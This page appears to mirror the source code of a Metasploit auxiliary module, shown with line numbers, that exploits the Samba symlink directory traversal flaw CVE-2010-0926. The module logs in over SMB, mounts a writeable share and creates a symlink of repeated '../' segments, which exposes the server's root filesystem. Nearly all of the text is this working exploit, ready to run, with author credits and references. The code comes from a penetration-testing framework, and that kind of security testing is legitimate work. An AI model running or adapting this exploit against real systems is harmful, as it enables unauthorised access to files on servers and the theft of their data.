Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  # Exploit mixins should be called first

9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Auxiliary::Report

11


12
  # Aliases for common classes

13
  SIMPLE = Rex::Proto::SMB::SimpleClient

14
  XCEPT = Rex::Proto::SMB::Exceptions

15
  CONST = Rex::Proto::SMB::Constants

16


17
  def initialize

18
    super(

19
      'Name' => 'Samba Symlink Directory Traversal',

20
      'Description' => %(

21
        This module exploits a directory traversal flaw in the Samba

22
      CIFS server. To exploit this flaw, a writeable share must be specified.

23
      The newly created directory will link to the root filesystem.

24
      ),

25
      'Author' => [

26
        'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html

27
        'hdm' # metasploit module

28
      ],

29
      'References' => [

30
        ['CVE', '2010-0926'],

31
        ['OSVDB', '62145'],

32
        ['URL', 'http://www.samba.org/samba/news/symlink_attack.html']

33
      ],

34
      'License' => MSF_LICENSE,

35
      'Notes' => {

36
        'Stability' => [CRASH_SAFE],

37
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],

38
        'Reliability' => []

39
      }

40
    )

41


42
    register_options([

43
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),

44
      OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])

45
    ])

46


47
    deregister_options('SMB::ProtocolVersion')

48
  end

49


50
  def run

51
    print_status('Connecting to the server...')

52
    connect(versions: [1])

53
    smb_login

54


55
    print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")

56
    simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")

57


58
    print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")

59
    simple.client.symlink(datastore['SMBTARGET'], '../' * 10)

60


61
    print_status('Now access the following share to browse the root filesystem:')

62
    print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")

63
    print_line('')

64
  end

65
end

66


67